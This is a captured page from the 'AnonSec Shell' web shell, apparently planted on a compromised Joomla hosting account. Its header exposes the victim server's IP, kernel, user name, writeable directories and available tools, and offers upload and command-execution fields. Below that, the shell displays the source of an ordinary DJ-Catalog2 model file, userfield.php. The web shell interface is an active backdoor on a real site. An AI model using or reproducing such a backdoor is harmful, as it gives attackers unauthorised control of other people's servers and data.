AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.112
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/c/o/o/coopiak/amisdesseniors-fr/administrator/components/com_djcatalog2/models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/c/o/o/coopiak/amisdesseniors-fr/administrator/components/com_djcatalog2/models/userfield.php
<?php
/**
 * @package DJ-Catalog2
 * @copyright Copyright (C) DJ-Extensions.com, All rights reserved.
 * @license http://www.gnu.org/licenses GNU/GPL
 * @author url: http://dj-extensions.com
 * @author email contact@dj-extensions.com
 */

// No direct access.
defined('_JEXEC') or die;
use Joomla\CMS\Factory;
use Joomla\CMS\Table\Table;
use Joomla\Registry\Registry;
//jimport('joomla.application.component.modeladmin');
require_once(JPATH_ROOT.'/administrator/components/com_djcatalog2/lib/modeladmin.php');

class Djcatalog2ModelUserfield extends DJCAdminModel
{
	protected $text_prefix = 'COM_DJCATALOG2';
	
	public function __construct($config = array()) {
		//$config['event_after_save'] = 'onFieldAfterSave';
		//$config['event_after_delete'] = 'onFieldAfterDelete';
		parent::__construct($config);
	}
	
	public function getTable($type = 'Userfields', $prefix = 'Djcatalog2Table', $config = array())
	{
		return Table::getInstance($type, $prefix, $config);
	}
	public function getForm($data = array(), $loadData = true)
	{
		// Initialise variables.
		$app	= Factory::getApplication();
		
		// Get the form.
		$form = $this->loadForm('com_djcatalog2.userfield', 'userfield', array('control' => 'jform', 'load_data' => $loadData));
		if (empty($form)) {
			return false;
		}
		
		$coreFields = Djcatalog2HelperUser::getCoreFields(true);
		
		$alias = $form->getValue('alias');
		if (in_array($alias, $coreFields)) {
			$form->setFieldAttribute('alias', 'readonly', 'readonly');
			$form->setFieldAttribute('name', 'readonly', 'readonly');
			
			$lockFields = Djcatalog2HelperUser::getCoreFields(false);
			if (!empty($lockFields[$alias]) && !empty($lockFields[$alias]['lock'])){
				foreach($lockFields[$alias]['lock'] as $fieldName) {
					$form->setFieldAttribute($fieldName, 'readonly', 'readonly');
				}
			}
		}
		return $form;
	}
	
	protected function loadFormData()
	{
		$data = Factory::getApplication()->getUserState('com_djcatalog2.edit.userfield.data', array());
		
		if (empty($data)) {
			$data = $this->getItem();
		}
		
		return $data;
	}
	
	protected function _prepareTable(&$table)
	{
		jimport('joomla.filter.output');
		$date = Factory::getDate();
		$user = Factory::getUser();
		
		$table->name		= htmlspecialchars_decode($table->name, ENT_QUOTES);
		
		if (empty($table->alias)) {
			$table->alias = OutputFilter::stringURLSafe($table->name);
			$table->alias = trim(str_replace('-','_',$table->alias));
			if(trim(str_replace('_','',$table->alias)) == '') {
				$table->alias = Factory::getDate()->format('Y_m_d_H_i_s');
			}
		}
		
		if (empty($table->id)) {
			if (empty($table->ordering)) {
				$db = Factory::getDbo();
				$db->setQuery('SELECT MAX(ordering) FROM #__djc2_users_extra_fields');
				$max = $db->loadResult();
				
				$table->ordering = $max+1;
			}
		}
	}
	
	protected function getReorderConditions($table)
	{
		$condition = array();
		return $condition;
	}
	
	public function delete(&$cid) {
		foreach($cid as $k=>$id) {
			if ($id < 1000) {
				unset($cid[$k]);
			}
		}
		
		if (count( $cid ))
		{
			$db = Factory::getDbo();
			$cids = implode(',', $cid);
			try {
				$db->setQuery('DELETE FROM #__djc2_users_extra_fields_values_text WHERE field_id IN ('.$cids.') ');
				$db->execute();
			}
			catch (Exception $e) {
				$this->setError($e->getMessage());
				return false;
			}
			
			$query = $db->getQuery(true);
			$query->select('*')->from('#__djc2_users_extra_fields_options')->where('field_id IN ('.$cids.')');
			$db->setQuery($query);
			$deleteOptions = $db->loadObjectList();
			
			foreach($deleteOptions as $option) {
				if (empty($option->params)) {
					continue;
				}
				
				$params = new Registry($option->params);
				$fileName = trim((string)$params->get('file_name', ''));
				
				if ($fileName) {
					$this->deleteColorFile($fileName);
				}
			}
			
			try {
				$db->setQuery('DELETE FROM #__djc2_users_extra_fields_values_int WHERE field_id IN ('.$cids.') ');
				$db->execute();
			}
			catch (Exception $e) {
				$this->setError($e->getMessage());
				return false;
			}
			try {
				$db->setQuery('DELETE FROM #__djc2_users_extra_fields_values_date WHERE field_id IN ('.$cids.') ');
				$db->execute();
			}
			catch (Exception $e) {
				$this->setError($e->getMessage());
				return false;
			}
		}
		return parent::delete($cid);
	}
	
	public function saveOptions($values, &$table, $newField) {
		$db = Factory::getDbo();
		$app = Factory::getApplication();
		
		$files = $app->input->files->get('fieldtype', array());
		
		if (!empty($values) && array_key_exists('id', $values) && array_key_exists('option', $values) && array_key_exists('position', $values)) {
			if ($table->type == 'select' || $table->type == 'checkbox' || $table->type == 'radio' || $table->type == 'color' || $table->type == 'multicolor'  || $table->type == 'multiselect') {
				
				$pks = array();
				$max = 1;
				
				foreach ($values['id'] as $key=>$id) {
					if ($values['option'][$key] != '') {
						$fo_table = Table::getInstance('UserFieldOptions', 'Djcatalog2Table', array());
						$isNew = true;
						// Load the row if saving an existing record.
						if ($id > 0 && $newField === false) {
							$fo_table->load($id);
							$isNew = false;
							$fo_table->params = new Registry($fo_table->params);
						} else {
							$fo_table->params = new Registry();
						}
						
						$data = array();
						$data['id'] = $isNew ? null:$id;
						//$data['value'] = htmlspecialchars($values['option'][$key]);
						$data['value'] = ($values['option'][$key]);
						$data['ordering'] = ($values['position'][$key] > 0) ? $values['position'][$key] : 0;
						$data['field_id'] = $table->id;
						
						$params = clone $fo_table->params;
						
						if ($table->type == 'color' || $table->type == 'multicolor') {
							if (isset($values['hexcode'][$key])) {
								$params->set('hexcode', $values['hexcode'][$key]);
							}
							
							$fileName = trim((string)$params->get('file_name', ''));
							$deleteOld = (bool)($values['file_name'][$key] == '' && $fileName != '');
							
							if ($deleteOld) {
								$this->deleteColorFile($fileName);
								$fileName = '';
							}
							
							if (isset($files['file']) && isset($files['file'][$key])) {
								$retVal = $this->saveColorFile($data, $key, $files);
								if (true !== $retVal) {
									$fileName = ($retVal) ? $retVal : '';
								}
							}
							$params->set('file_name', $fileName);
						}
						
						$data['params'] = $params->toString('JSON');
						
						// Bind the data.
						if (!$fo_table->bind($data)) {
							$this->setError($fo_table->getError());
							return false;
						}
						if (empty($fo_table->ordering) || !$fo_table->ordering) {
							$fo_table->ordering = $max;
						}
						$max = $fo_table->ordering + 1;
						// Check the data.
						if (!$fo_table->check()) {
							$this->setError($fo_table->getError());
							return false;
						}
						
						// Store the data.
						if (!$fo_table->store()) {
							$this->setError($fo_table->getError());
							return false;
						}
						
						$pks[] = $fo_table->id;
					}
				}
				
				if (!empty($pks)) {
					$query = $db->getQuery(true);
					$query->select('*')->from('#__djc2_users_extra_fields_options')->where('field_id='.(int)$table->id)->where('id NOT IN ('.implode(',', $pks).')');
					$db->setQuery($query);
					$deleteOptions = $db->loadObjectList();
					
					$optionIds = array();
					foreach($deleteOptions as $option) {
						$optionIds[] = $option->id;
						
						if (empty($option->params)) {
							continue;
						}
						
						$params = new Registry($option->params);
						$fileName = trim((string)$params->get('file_name', ''));
						
						if ($fileName) {
							$this->deleteColorFile($fileName);
						}
					}
					
					if (count($optionIds) > 0) {
						$query = $db->getQuery(true);
						$query->delete('#__djc2_users_extra_fields_options')->where('id IN ('.implode(',', $optionIds).')');
						$db->setQuery($query);
						$db->execute();
					}
				}
			}
		}
		return true;
	}
	public function deleteOptions(&$table) {
		$db = Factory::getDbo();
		$db->setQuery('DELETE FROM #__djc2_users_extra_fields_options WHERE field_id='.(int)$table->id);
		if (!$db->execute()){
			$this->setError($db->getError());
		}
		return true;
		
		
	}
	public function saveColorFile($data, $key, $files) {
		$postFile = $files['file'][$key];
		$path = DJCATIMGFOLDER.'/colors';
		
		$fileName = '';
		
		if ($postFile['name'] && $postFile['tmp_name']) {
			if ($postFile['error'] === 0 && $postFile['size'] > 0) {
				$lang = Factory::getApplication()->getLanguage();
				
				$fileExt = File::getExt($postFile['name']);
				$fileBase = File::stripExt($postFile['name']);
				$fileName = File::makeSafe($lang->transliterate(\Joomla\String\StringHelper::strtolower((string)$data['field_id'].'-'.$data['value'] . '-'.$fileBase).'.'.$fileExt));
				$fileName = str_replace(' ', '-', $fileName);
				if (!Folder::exists(JPath::clean($path))) {
					Folder::create(JPath::clean($path));
				}
				
				if (!File::upload($postFile['tmp_name'], JPath::clean($path.'/'.$fileName))) {
					return false;
				}
				
				return $fileName;
			} else {
				return !($postFile['size'] > 0);
			}
		}
		
		return true;
	}
	
	public function deleteColorFile($fileName) {
		$path = DJCATIMGFOLDER.'/colors';
		
		if ($fileName) {
			$filePath = $path.'/'.$fileName;
			
			if (File::exists(JPath::clean($filePath))) {
				File::delete(JPath::clean($filePath));
			}
		}
		
		return true;
	}
	
	/**
	 * Method to test whether a record can be deleted.
	 *
	 * @param   object  $record  A record object.
	 *
	 * @return  boolean  True if allowed to delete the record. Defaults to the permission for the component.
	 *
	 * @since   1.6
	 */
	protected function canDelete($record)
	{
		return Factory::getUser()->authorise('core.delete', $this->option) || Factory::getUser()->authorise('djcatalog2.admin.catalogue', $this->option);
	}
	
	/**
	 * Method to test whether a record can have its state changed.
	 *
	 * @param   object  $record  A record object.
	 *
	 * @return  boolean  True if allowed to change the state of the record. Defaults to the permission for the component.
	 *
	 * @since   1.6
	 */
	protected function canEditState($record)
	{
		return Factory::getUser()->authorise('core.edit.state', $this->option)  || Factory::getUser()->authorise('djcatalog2.admin.catalogue', $this->option);
	}
}

Anon7 - 2022
AnonSec Team